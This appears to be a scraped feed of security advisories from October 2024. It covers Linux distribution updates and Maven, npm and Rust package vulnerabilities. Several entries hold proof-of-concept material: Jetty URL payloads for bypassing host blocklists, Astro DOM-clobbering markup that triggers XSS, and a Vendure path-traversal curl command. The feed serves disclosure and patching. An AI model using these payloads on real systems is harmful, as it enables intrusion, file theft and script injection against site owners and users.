12.10.2024 04:44:06fedora[FEDORA-2024-4ab266b9ca] Fedora 40: chromium (high)Update to 129.0.6668.100 * CVE-2024-9602: Type Confusion in V8 * CVE-2024-9603: Type Confusion in Vhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4ab266b9ca
12.10.2024 04:42:23fedora[FEDORA-2024-5b8cfa7937] Fedora 40: thunderbirdUpdate to 128.3.1 https://www.thunderbird.net/en-US/thunderbird/128.3.1esr/releasenotes/ Update to 128.3.0 https://www.mozilla.org/en-US/security/advisories/mfsa2024-49/ https://www.thunderbird.net/en-US/thunderbird/128.3.0esr/releasenotes/https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5b8cfa7937
12.10.2024 04:42:06fedora[FEDORA-2024-e36b567b66] Fedora 40: mosquittoUpdate to 2.0.19https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e36b567b66
12.10.2024 04:41:59fedora[FEDORA-2024-5d4eb04e76] Fedora 40: redis (high)Redis Community Edition 7.2.6 Released Wed 02 Oct 2024 20:17:04 IDT. Upgrade urgency SECURITY: See security fixes below. Security fixes: CVE-2024-31449 Lua library commands may lead to stack overflow and potential RCE. CVE-2024-31227 Potential Denial-of-service due to malformed ACL selectors. CVE-2024-31228 Potential Denial-of-service due to unbounded pattern matching.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5d4eb04e76
12.10.2024 03:23:58fedora[FEDORA-2024-a59306afa3] Fedora 41: chromium (high)Update to 129.0.6668.100 * CVE-2024-9602: Type Confusion in V8 * CVE-2024-9603: Type Confusion in Vhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a59306afa3
12.10.2024 03:23:57fedora[FEDORA-2024-b8b5224019] Fedora 41: kernel, kernel-headersThe 6.11.3 stable kernel update contains a number of important bugfixes across the tree.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b8b5224019
12.10.2024 03:21:33fedora[FEDORA-2024-89014f5794] Fedora 41: python-virtualenvPrevent command injection by quoting template strings in activation scriptshttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-89014f5794
12.10.2024 03:21:03fedora[FEDORA-2024-0078a55acf] Fedora 41: mosquittoUpdate to 2.0.19. Fix FTBFS (closes rhbz#2300978)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0078a55acf
12.10.2024 03:20:50fedora[FEDORA-2024-2096f5d14c] Fedora 41: rust-libcramjam, rust-brotli-decompressor, rust-nu-command, rust-brotli, rust-tower-http & 4 moreUpdate rust-brotli-decompressor to 4.0.1, rust-brotli to 7.0.0, and rust-async-compression to 0.4.13. Patch dependent packages as needed to avoid compat packages. Drop i686 support in rust-libcramjam and python-cramjam.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2096f5d14c
12.10.2024 01:16:59maven[MAVEN:GHSA-76MW-6P95-X9X5] pac4j-core affected by a Java deserialization vulnerability (critical)pac4j is a security framework for Java. `pac4j-core` prior to version 4.0.0 is affected by a Java deserialization vulnerability. The vulnerability affects systems that store externally controlled values in attributes of the `UserProfile` class from pac4j-core. It can be exploited by providing an attribute that contains a serialized Java object with a special prefix `{#sb64}` and Base64 encoding. This issue may lead to Remote Code Execution (RCE) in the worst case. Although a `RestrictedObjectInputStream` is in place, that puts some restriction on what classes can be deserialized, it still allows a broad range of java packages and potentially exploitable with different gadget chains. pac4j versions 4.0.0 and greater are not affected by this issue. Users are advised to upgrade. There are no known workarounds for this vulnerability.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-76MW-6P95-X9X5
11.10.2024 22:44:07npm[NPM:GHSA-VGXQ-6RCF-QWRW] angular-base64-upload vulnerable to unauthenticated remote code execution (critical)angular-base64-upload versions prior to v0.1.21 are vulnerable to unauthenticated remote code execution via the `angular-base64-upload/demo/server.php` endpoint. Exploitation of this vulnerability involves uploading arbitrary file content to the server, which can subsequently be accessed through the `angular-base64-upload/demo/uploads` endpoint. This leads to the execution of previously uploaded content, which enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VGXQ-6RCF-QWRW
11.10.2024 20:27:30npm[NPM:GHSA-GX9M-WHJM-85JF] DOMpurify has a nesting-based mXSS (high)DOMpurify was vulnerable to nesting-based mXSS, fixed by [0ef5e537](https://github.com/cure53/DOMPurify/tree/0ef5e537a514f904b6aa1d7ad9e749e365d7185f) (2.x) and [merge 943](https://github.com/cure53/DOMPurify/pull/943). Backporters should be aware of GHSA-mmhx-hmjr-r674 (CVE-2024-45801) when cherry-picking. A PoC is available under [test](https://github.com/cure53/DOMPurify/blob/0ef5e537a514f904b6aa1d7ad9e749e365d7185f/test/test-suite.js#L2098).https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GX9M-WHJM-85JF
11.10.2024 19:51:57ubuntu[USN-7063-1] Ubuntu Advantage Desktop Daemon vulnerabilityUbuntu Advantage Desktop Daemon could be made to expose sensitive information.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7063-1
11.10.2024 18:00:52suse[SUSE-SU-2024:3604-1] Security update for OpenIPMI (moderate)Security update for OpenIPMIhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3604-1
11.10.2024 15:33:46suse[SUSE-SU-2024:3603-1] Security update for MozillaFirefox (critical)Security update for MozillaFirefoxhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3603-1
13.10.2024 04:32:37fedora[FEDORA-2024-ec78ab2c45] Fedora 39: p7zipFix wrapper to hide password from process historyhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ec78ab2c45
13.10.2024 03:42:35fedora[FEDORA-2024-2e8c63e8bf] Fedora 41: buildah, podman (medium)Automatic update for buildah-1.37.4-1.fc41, podman-5.2.4-1.fc41. Changelog for buildah: * Mon Oct 07 2024 Packit <hello(a)packit.dev> - 2:1.37.4-1 - Update to 1.37.4 upstream release. Changelog for podman: * Mon Oct 07 2024 Packit <hello(a)packit.dev> - 5:5.2.4-1 - Update to 5.2.4 upstream release. Fixes CVE-2024-9341 and CVE-2024-9407.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2e8c63e8bf
14.10.2024 04:57:23fedora[FEDORA-2024-2ac7273bab] Fedora 40: libgsf (high)Fixes for memory vulnerabilities.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2ac7273bab
14.10.2024 04:56:53fedora[FEDORA-2024-9694c3eec0] Fedora 40: webkit2gtk4.0 (high)Update to 2.46.1https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9694c3eec0
14.10.2024 04:42:56fedora[FEDORA-2024-7d06f67cf5] Fedora 39: libgsf (high)Fixes for memory vulnerabilities.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7d06f67cf5
13.10.2024 04:32:51fedora[FEDORA-2024-5ee2c7c696] Fedora 39: chromium (high)Update to 129.0.6668.100 * CVE-2024-9602: Type Confusion in V8 * CVE-2024-9603: Type Confusion in Vhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5ee2c7c696
15.10.2024 03:19:45fedora[FEDORA-2024-9cc95d56ce] Fedora 41: edk2Security fix for CVE-2023-6237 (openssl: Excessive time spent checking invalid RSA public keys)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9cc95d56ce
15.10.2024 03:19:44fedora[FEDORA-2024-ff08c2b41a] Fedora 41: libgsf (high)Fixes for memory vulnerabilities.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ff08c2b41a
15.10.2024 03:19:36fedora[FEDORA-2024-347164df1c] Fedora 41: rust-tower, rust-rustls-native-certs, rust-reqwest, rust-rustls-native-certs0.7, rust-tonic-types & 6 more (none)Update the hyper-rustls crate to version 0.27.3. Update the reqwest crate to version 0.12.8. Update the rustls-native-certs crate to version 0.8.0 and add a compat package for version 0.7. Update the tonic, tonic-build, and tonic-types crates to version 0.12.3. Update the tower crate to version 0.5.1 and add a compat package for version 0.4. Update the tower-http crate to version 0.6.1 and add a compat package for version 0.5.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-347164df1c
15.10.2024 03:19:20fedora[FEDORA-2024-825c52d96f] Fedora 41: kojiUpdate to 1.35.1. Includes fix for CVE-2024-9427https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-825c52d96f
15.10.2024 00:11:44maven[MAVEN:GHSA-QH8G-58PP-2WXH] Eclipse Jetty URI parsing of invalid authority (low)

## Summary

Eclipse Jetty is a lightweight, highly scalable, Java-based web server and Servlet engine. It includes a utility class, `HttpURI`, for URI/URL parsing.

The `HttpURI` class does insufficient validation on the authority segment of a URI. However, the behaviour of `HttpURI` differs from the common browsers in how it handles a URI that would be considered invalid if fully validated against the RFC. Specifically, `HttpURI` and the browser may differ on the value of the host extracted from an invalid URI, and thus a combination of Jetty and a vulnerable browser may be vulnerable to an open redirect attack or to an SSRF attack if the URI is used after passing validation checks.

## Details

### Affected components

The vulnerable component is the `HttpURI` class when used as a utility class in an application. The Jetty usage of the class is not vulnerable.

### Attack overview

The `HttpURI` class does not properly validate the authority section of a URI. When presented with an illegal authority that may contain user info (e.g. username:password#@hostname:port), the parsing of the URI does not fail. Moreover, the interpretation of which part of the authority is the host name differs from a common browser: browsers also do not fail, but they select a different host name from the illegal URI.

### Attack scenario

A typical attack scenario is illustrated in the diagram below. The Validator checks whether the attacker-supplied URL is on the blocklist. If not, the URI is passed to the Requester for redirection. The Requester is responsible for sending requests to the hostname specified by the URI.

This attack occurs when the Validator is the `org.eclipse.jetty.http.HttpURI` class and the Requester is the Browser (including Chrome, Firefox and Safari). An attacker can send a malformed URI to the Validator (e.g., `http://browser.check%23%40vulndetector.com/`). After validation, the Validator finds that the hostname is not on the blocklist. However, the Requester can still send requests to the domain with the hostname `vulndetector.com`.

## PoC

Payloads:

```
http://browser.check &@vulndetector.com/
http://browser.check #@vulndetector.com/
http://browser.check?@vulndetector.com/
http://browser.check#@vulndetector.com/
http://vulndetector.com\\/
```

The problem of 302 redirect parsing in HTML tag scenarios. Below is a PoC example. After clicking the button, the browser will open "browser.check", and Jetty will parse this URL as "vulndetector.com".

```
<a href="http://browser.check#@vulndetector.com/"></a>
```

A comparison of the parsing differences between Jetty and Chrome is shown in the table below (note that neither should accept the URI as valid).

| Invalid URI | Jetty | Chrome |
| --- | --- | --- |
| http://browser.check &@vulndetector.com/ | vulndetector.com | browser.check |
| http://browser.check #@vulndetector.com/ | vulndetector.com | browser.check |
| http://browser.check?@vulndetector.com/ | vulndetector.com | browser.check |
| http://browser.check#@vulndetector.com/ | vulndetector.com | browser.check |

The problem of 302 redirect parsing in an HTTP 302 Location header:

| Input | Jetty | Chrome |
| --- | --- | --- |
| http://browser.check%5c/ | browser.check\ | browser.check |

It is noteworthy that Spring Web also faced similar security vulnerabilities, being affected by the aforementioned four types of payloads. These issues have since been resolved and have been assigned three CVE numbers [3-5].

## Impact

The impact of this vulnerability is limited to developers that use the Jetty HttpURI directly. Example: your project implemented a blocklist to block some hosts based on HttpURI's handling of the authority section. The vulnerability will help attackers bypass the protections that developers have set up for hosts. The vulnerability will lead to **SSRF** [1] and **URL Redirection** [2] vulnerabilities in several cases.

## Mitigation

The attacks outlined above rely on decoded user data being passed to the `HttpURI` class. Applications should not pass decoded user data as an encoded URI to any URI class/method, including `HttpURI`. Such applications are likely to be vulnerable in other ways. The immediate solution is to upgrade to a version of the class that will fully validate the characters of the URI authority. Ultimately, Jetty will deprecate and remove support for user info in the authority per [RFC9110 Section 4.2.4](https://datatracker.ietf.org/doc/html/rfc9110#section-4.2.4). Note that Chrome (and other browsers) parse the invalid user info section improperly as well (due to flawed WhatWG URL parsing rules that do not apply outside of a Web Browser).

## Reference

[1] https://cwe.mitre.org/data/definitions/918.html
[2] https://cwe.mitre.org/data/definitions/601.html
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QH8G-58PP-2WXH
15.10.2024 00:08:39 | maven | [MAVEN:GHSA-G8M5-722R-8WHQ] Eclipse Jetty's ThreadLimitHandler.getRemote() vulnerable to remote DoS attacks (moderate)

### Impact

A remote DoS attack can cause an out-of-memory condition.

### Description

There exists a security vulnerability in Jetty's `ThreadLimitHandler.getRemote()` which can be exploited by unauthorized users to cause a remote denial-of-service (DoS) attack. By repeatedly sending crafted requests, attackers can trigger OutOfMemory errors and exhaust the server's memory.

### Affected Versions

* Jetty 12.0.0-12.0.8 (Supported)
* Jetty 11.0.0-11.0.23 (EOL)
* Jetty 10.0.0-10.0.23 (EOL)
* Jetty 9.3.12-9.4.55 (EOL)

### Patched Versions

* Jetty 12.0.9
* Jetty 11.0.24
* Jetty 10.0.24
* Jetty 9.4.56

### Workarounds

Do not use `ThreadLimitHandler`. Consider use of `QoSHandler` instead to artificially limit resource utilization.

### References

Jetty 12 - https://github.com/jetty/jetty.project/pull/11723

Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G8M5-722R-8WHQ

15.10.2024 00:07:30 | maven | [MAVEN:GHSA-R7M4-F9H5-GR79] Eclipse Jetty's PushSessionCacheFilter can cause remote DoS attacks (low)

### Impact

Jetty PushSessionCacheFilter can be exploited by unauthenticated users to launch remote DoS attacks by exhausting the server's memory.

### Patches

* https://github.com/jetty/jetty.project/pull/9715
* https://github.com/jetty/jetty.project/pull/9716

### Workarounds

The session usage is intrinsic to the design of the PushCacheFilter. The issue can be avoided by:

+ not using the PushCacheFilter. Push has been deprecated by the various IETF specs and early hints responses should be used instead.
+ reducing the idle timeout on unauthenticated sessions, which will reduce the time such sessions stay in memory.
+ configuring a session cache to use [session passivation](https://jetty.org/docs/jetty/12/programming-guide/server/session.html), so that sessions are not stored in memory, but rather in a database or file system that may have significantly more capacity than memory.

### References

* https://github.com/jetty/jetty.project/pull/10756
* https://github.com/jetty/jetty.project/pull/10755

Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R7M4-F9H5-GR79

14.10.2024 23:56:44 | maven | [MAVEN:GHSA-XMMM-JW76-Q7VG] One Time Passcode (OTP) is valid longer than expiration time (moderate)
A vulnerability was found in Keycloak. Expired OTP codes are still usable when using FreeOTP when the OTP token period is set to 30 seconds (default). Instead of expiring and being deemed unusable around 30 seconds in, the tokens are valid for an additional 30 seconds, totaling 1 minute. A one time passcode that is valid longer than its expiration time increases the attack window for malicious actors to abuse the system and compromise accounts. Additionally, it increases the attack surface because at any given time, two OTPs are valid.
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XMMM-JW76-Q7VG

14.10.2024 23:55:49 | maven | [MAVEN:GHSA-5RXP-2RHR-QWQV] Session fixation in Elytron SAML adapters (high)
A session fixation issue was discovered in the SAML adapters provided by Keycloak. The session ID and JSESSIONID cookie are not changed at login time, even when the turnOffChangeSessionIdOnLogin option is configured. This flaw allows an attacker who hijacks the current session before authentication to trigger session fixation.
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5RXP-2RHR-QWQV

14.10.2024 23:55:24 | maven | [MAVEN:GHSA-W8GR-XWP4-R9F7] Vulnerable Redirect URI Validation Results in Open Redirect (moderate)
A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost/ or http://127.0.0.1/, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W8GR-XWP4-R9F7

14.10.2024 23:54:53 | maven | [MAVEN:GHSA-XGFV-XPX8-QHCR] Improper Verification of SAML Responses Leading to Privilege Escalation in Keycloak (high)
A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XGFV-XPX8-QHCR

15.10.2024 01:24:03 | npm | [NPM:GHSA-M85W-3H95-HCF9] DOM Clobbering Gadget found in astro's client-side router that leads to XSS (moderate)

### Summary

A DOM Clobbering gadget has been discovered in Astro's client-side router. It can lead to cross-site scripting (XSS) on websites that enable Astro's client-side routing and have *stored* attacker-controlled scriptless HTML elements (i.e., `iframe` tags with unsanitized `name` attributes) on the destination pages.

### Details

#### Background

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markup in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of JS code) living in the existing JavaScript code to transform it into executable code. For more information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

#### Gadgets found in Astro

We identified a DOM Clobbering gadget in Astro's client-side routing module, specifically in the `<ViewTransitions />` component. When integrated, this component introduces the following vulnerable code, which is executed during page transitions (e.g., clicking an `<a>` link):

https://github.com/withastro/astro/blob/7814a6cad15f06931f963580176d9b38aa7819f2/packages/astro/src/transitions/router.ts#L135-L156

However, this implementation is vulnerable to a DOM Clobbering attack. The `document.scripts` lookup can be shadowed by attacker-injected non-script HTML elements (e.g., `<img name="scripts"><img name="scripts">`) via the browser's named DOM access mechanism. This manipulation allows an attacker to replace the intended script elements with an array of attacker-controlled scriptless HTML elements. The condition `script.dataset.astroExec === ''` on line 138 can be bypassed because the attacker-controlled element does not have a data-astroExec attribute. Similarly, the check on line 134 can be bypassed as the element does not require a `type` attribute. Finally, the `innerHTML` of an attacker-injected non-script HTML element, which was plain text content before, will be set to the `.innerHTML` of a script element, which leads to XSS.

### PoC

Consider a web application using Astro as the framework with client-side routing enabled and allowing users to embed certain scriptless HTML elements (e.g., `form` or `iframe`). This can be done through various website features that allow users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

For a PoC website, please refer to: `https://stackblitz.com/edit/github-4xgj2d`. Clicking the "about" button in the menu will trigger an `alert(1)` from an attacker-injected `form` element.

```
---
import Header from "../components/Header.astro";
import Footer from "../components/Footer.astro";
import { ViewTransitions } from "astro:transitions";
import "../styles/global.css";
const { pageTitle } = Astro.props;
---
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <link rel="icon" type="image/svg+xml" href="/favicon.svg" />
    <meta name="viewport" content="width=device-width" />
    <meta name="generator" content={Astro.generator} />
    <title>{pageTitle}</title>
    <ViewTransitions />
  </head>
  <body>
    <!--USER INPUT-->
    <iframe name="scripts">alert(1)</iframe>
    <iframe name="scripts">alert(1)</iframe>
    <!--USER INPUT-->
    <Header />
    <h1>{pageTitle}</h1>
    <slot />
    <Footer />
    <script>
      import "../scripts/menu.js";
    </script>
  </body>
</html>
```

### Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites built with Astro that enable client-side routing with `ViewTransitions` and store user-inserted scriptless HTML tags without properly sanitizing the `name` attributes on the page.

### Patch

We recommend replacing `document.scripts` with `document.getElementsByTagName('script')` for referring to script elements. This will mitigate the possibility of DOM Clobbering attacks leveraging the `name` attribute.

### Reference

Similar issues for reference:

+ Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986))
+ Vite ([CVE-2024-45812](https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3))
+ layui ([CVE-2024-47075](https://github.com/layui/layui/security/advisories/GHSA-j827-6rgf-9629))

Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M85W-3H95-HCF9

14.10.2024 22:45:23 | npm | [NPM:GHSA-G77X-44XX-532M] Denial of Service condition in Next.js image optimization (moderate)

### Impact

The image optimization feature of Next.js contained a vulnerability which allowed for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption.

**Not affected:**

- The `next.config.js` file is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value.
- The Next.js application is hosted on Vercel.

### Patches

This issue was fully patched in Next.js `14.2.7`. We recommend that users upgrade to at least this version.

### Workarounds

Ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.

#### Credits

Brandon Dahler (brandondahler), AWS
Dimitrios Vlastaras

Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G77X-44XX-532M

15.10.2024 00:17:14 | maven | [MAVEN:GHSA-443J-GRXV-2PGV] Apache ActiveMQ Artemis: Authenticated users could perform RCE via Jolokia MBeans (high)
Apache ActiveMQ Artemis allows access to diagnostic information and controls through MBeans, which are also exposed through the authenticated Jolokia endpoint. Before version 2.29.0, this also included the Log4J2 MBean. This MBean is not meant for exposure to non-administrative users. This could eventually allow an authenticated attacker to write arbitrary files to the filesystem and indirectly achieve RCE.
Users are recommended to upgrade to version 2.29.0 or later, which fixes the issue.
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-443J-GRXV-2PGV

14.10.2024 18:57:06 | ubuntu | [USN-7040-2] ConfigObj vulnerability (medium)
ConfigObj could be made to crash if it received specially crafted input.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7040-2

14.10.2024 18:48:57 | ubuntu | [USN-7014-3] nginx vulnerability (medium)
nginx could be made to crash if it received specially crafted network traffic.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7014-3

15.10.2024 00:14:32 | maven | [MAVEN:GHSA-J26W-F9RQ-MR2Q] Eclipse Jetty has a denial of service vulnerability on DosFilter (moderate)

Description
There exists a security vulnerability in Jetty's DosFilter which can be exploited by unauthorized users to cause a remote denial-of-service (DoS) attack on a server using DosFilter. By repeatedly sending crafted requests, attackers can trigger OutOfMemory errors and ultimately exhaust the server's memory.

Vulnerability details
The Jetty DoSFilter (Denial of Service Filter) is a security filter designed to protect web applications against certain types of Denial of Service (DoS) attacks and other abusive behavior. It helps to mitigate excessive resource consumption by limiting the rate at which clients can make requests to the server. The DoSFilter monitors and tracks client request patterns, including request rates, and can take actions such as blocking or delaying requests from clients that exceed predefined thresholds. The internal tracking of requests in DoSFilter is the source of this OutOfMemory condition.

Impact
Users of the DoSFilter may be subject to DoS attacks that will ultimately exhaust the memory of the server if they have not configured session passivation or an aggressive session inactivation timeout.

Patches
The DoSFilter has been patched in all active releases to no longer support the session tracking mode, even if configured.

Patched releases:
* 9.4.54
* 10.0.18
* 11.0.18
* 12.0.3

Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J26W-F9RQ-MR2Q

14.10.2024 17:00:19 | ubuntu | [USN-6968-3] PostgreSQL vulnerability (high)
PostgreSQL could execute arbitrary SQL functions as the superuser if it received a specially crafted SQL object.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6968-3

14.10.2024 15:54:27 | ubuntu | [USN-7015-4] Python vulnerability (medium)
Python could be made to bypass some restrictions if it received specially crafted input.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7015-4

14.10.2024 15:54:08 | ubuntu | [USN-7067-1] HAProxy vulnerability (high)
HAProxy could be made to crash or run programs if it received specially crafted network traffic.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7067-1

14.10.2024 09:21:48 | ubuntu | [USN-7066-1] Thunderbird vulnerability (critical)
Thunderbird could be made to crash or run programs if it opened a specially crafted file.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7066-1

14.10.2024 06:51:43 | ubuntu | [USN-7065-1] Firefox vulnerability (critical)
Firefox could be made to run programs as your login if it opened a malicious website.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7065-1

14.10.2024 22:18:55 | rustsec | [RUSTSEC-2024-0378] Risk of use-after-free in `borrowed` reads from Python weak references
The family of functions to read "borrowed" values from Python weak references were fundamentally unsound, because the weak reference does not itself have ownership of the value. At any point the last strong reference could be cleared and the borrowed value would become dangling.
In PyO3 0.22.4 these functions have all been deprecated and patched to leak a strong reference as a mitigation. PyO3 0.23 will remove these functions entirely.
Link: https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0378

14.10.2024 19:27:22 | npm | [NPM:GHSA-PPPG-CPFQ-H7WR] JSONPath Plus Remote Code Execution (RCE) Vulnerability (critical)
Versions of the package jsonpath-plus before 10.0.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of vm in Node.
**Note:** The unsafe behavior is still available after applying the fix but it is not turned on by default.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PPPG-CPFQ-H7WR

16.10.2024 04:34:57 | fedora | [FEDORA-2024-83e96146cf] Fedora 39: valkey (high)
Update to 8.0.1. Fixes:
- (CVE-2024-31449) Lua library commands may lead to stack overflow and potential RCE.
- (CVE-2024-31227) Potential Denial-of-service due to malformed ACL selectors.
- (CVE-2024-31228) Potential Denial-of-service due to unbounded pattern matching.
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-83e96146cf

16.10.2024 04:34:56 | fedora | [FEDORA-2024-08a6626c11] Fedora 39: pdns-recursor (high)
Update to latest upstream
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-08a6626c11

16.10.2024 04:08:03 | fedora | [FEDORA-2024-8a9a692906] Fedora 40: valkey (high)
Update to 8.0.1. Fixes:
- (CVE-2024-31449) Lua library commands may lead to stack overflow and potential RCE.
- (CVE-2024-31227) Potential Denial-of-service due to malformed ACL selectors.
- (CVE-2024-31228) Potential Denial-of-service due to unbounded pattern matching.
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8a9a692906

16.10.2024 04:08:02 | fedora | [FEDORA-2024-af0bf62ac6] Fedora 40: pdns-recursor (high)
Update to latest upstream
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-af0bf62ac6

15.10.2024 22:56:06 | npm | [NPM:GHSA-QCVH-P9JQ-WP8V] Malicious homeservers can steal message keys when the matrix-react-sdk user invites another user to a room (high)

### Impact

matrix-react-sdk before 3.102.0 allows a malicious homeserver to potentially steal message keys for a room when a user invites another user to that room, via injection of a malicious device controlled by the homeserver. This is possible because matrix-react-sdk before 3.102.0 shared historical message keys on invite.

### Patches

matrix-react-sdk 3.102.0 [disables sharing message keys on invite](https://github.com/matrix-org/matrix-react-sdk/pull/12618) by removing calls to the vulnerable functionality.

### Workarounds

None.

### References

The vulnerability in matrix-react-sdk is caused by calling `MatrixClient.sendSharedHistoryKeys` in matrix-js-sdk, which is inherently vulnerable to this sort of attack. This matrix-js-sdk vulnerability is tracked as CVE-2024-47080 / [GHSA-4jf8-g8wp-cx7c](https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-4jf8-g8wp-cx7c). Given that this functionality is not specific to sharing message keys on *invite*, is optional, has to be explicitly called by the caller and has been independently patched in matrix-react-sdk by removing the offending calls, we believe it is proper to treat the matrix-react-sdk vulnerability as a separate one, with its own advisory and CVE.

The matrix-org/matrix-react-sdk repository has recently been archived and the project was moved to [element-hq/matrix-react-sdk](https://github.com/element-hq/matrix-react-sdk). Given that this happened *after* the first patched release, no releases of the project on [element-hq/matrix-react-sdk](https://github.com/element-hq/matrix-react-sdk) were ever vulnerable to this vulnerability.

Patching pull request: https://github.com/matrix-org/matrix-react-sdk/pull/12618.

### For more information

If you have any questions or comments about this advisory, please email us at [security at matrix.org](mailto:security@matrix.org).

Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QCVH-P9JQ-WP8V

15.10.2024 21:07:26 | npm | [NPM:GHSA-4JF8-G8WP-CX7C] Matrix JavaScript SDK's key history sharing could share keys to malicious devices (high)

### Impact

In matrix-js-sdk versions 9.11.0 through 34.7.0, the method `MatrixClient.sendSharedHistoryKeys` is vulnerable to interception by malicious homeservers. The method implements functionality proposed in [MSC3061](https://github.com/matrix-org/matrix-spec-proposals/pull/3061) and can be used by clients to share historical message keys with newly invited users, granting them access to past messages in the room.

However, it unconditionally sends these "shared" keys to all of the invited user's devices, regardless of whether the user's cryptographic identity is verified or whether the user's devices are signed by that identity. This allows the attacker to potentially inject its own devices to receive sensitive historical keys without proper security checks.

Note that this only affects clients running the SDK with the legacy crypto stack. Clients using the new Rust cryptography stack (i.e. those that call `MatrixClient.initRustCrypto()` instead of `MatrixClient.initCrypto()`) are unaffected by this vulnerability, because `MatrixClient.sendSharedHistoryKeys()` raises an exception in such environments.

### Patches

Fixed in matrix-js-sdk 34.8.0 by removing the vulnerable functionality.

### Workarounds

Remove use of affected functionality from clients.

### References

- [MSC3061](https://github.com/matrix-org/matrix-spec-proposals/pull/3061)

### For more information

If you have any questions or comments about this advisory, please email us at [security at matrix.org](mailto:security@matrix.org).

Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4JF8-G8WP-CX7C

15.10.2024 22:56:27 | npm | [NPM:GHSA-R9MQ-3C9R-FMJQ] Vendure asset server plugin has local file read vulnerability with AssetServerPlugin & LocalAssetStorageStrategy (critical)

# Description

## Path traversal

This vulnerability allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server.

From Rajesh Sharma, who discovered the vulnerability:

POC: `curl --path-as-is http://localhost:3000/assets/../package.json` gives you the content of package.json present in the local directory.

The vulnerability stems from usage of decodedReqPath directly in path.join without performing any path normalization, i.e. path.normalize in node.js:

https://github.com/vendure-ecommerce/vendure/blob/801980e8f599c28c5059657a9d85dd03e3827992/packages/asset-server-plugin/src/plugin.ts#L352-L358

